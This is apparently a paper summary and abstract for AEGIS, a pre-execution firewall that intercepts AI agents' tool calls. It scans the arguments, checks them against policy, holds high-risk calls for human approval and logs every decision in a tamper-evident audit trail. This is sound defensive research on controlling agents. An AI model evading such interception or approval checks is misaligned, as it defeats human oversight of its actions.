🤖 AI Summary
Current AI agents lack a general-purpose pre-execution safety control mechanism when invoking external tools, often leading to uncontrolled high-risk operations. This work proposes the first framework-agnostic pre-execution mediation architecture that introduces a three-stage safety pipeline prior to tool invocation: deep string extraction, content-priority risk scanning, and composable policy validation. The design incorporates Ed25519 digital signatures and SHA-256 hash chains to ensure tamper-proof audit trails. Evaluated across 14 widely used agent frameworks in Python, JavaScript, and Go, the approach achieves a 100% interception rate on 48 adversarial test cases, with only a 1.2% false positive rate over 500 benign invocations. The median latency for one thousand interceptions is as low as 8.3 milliseconds, demonstrating strong security guarantees without compromising efficiency or practicality.
📝 Abstract
AI agents increasingly act through external tools: they query databases, execute shell commands, read and write files, and send network requests. Yet in most current agent stacks, model-generated tool calls are handed to the execution layer with no framework-agnostic control point in between. Post-execution observability can record these actions, but it cannot stop them before side effects occur. We present AEGIS, a pre-execution firewall and audit layer for AI agents. AEGIS interposes on the tool-execution path and applies a three-stage pipeline: (i) deep string extraction from tool arguments, (ii) content-first risk scanning, and (iii) composable policy validation. High-risk calls can be held for human approval, and all decisions are recorded in a tamper-evident audit trail based on Ed25519 signatures and SHA-256 hash chaining. In the current implementation, AEGIS supports 14 agent frameworks across Python, JavaScript, and Go with lightweight integration. On a curated suite of 48 attackinstances, AEGIS blocks all attacks in the suite before execution; on 500 benign tool calls, it yields a 1.2% false positive rate; and across 1,000 consecutive interceptions, it adds 8.3 ms median latency. The live demo will show end-to-end interception of benign, malicious, and human-escalated tool calls, allowing attendees to observe real-time blocking, approval workflows, and audit-trail generation. These results suggest that pre-execution mediation for AI agents can be practical, low-overhead, and directly deployable.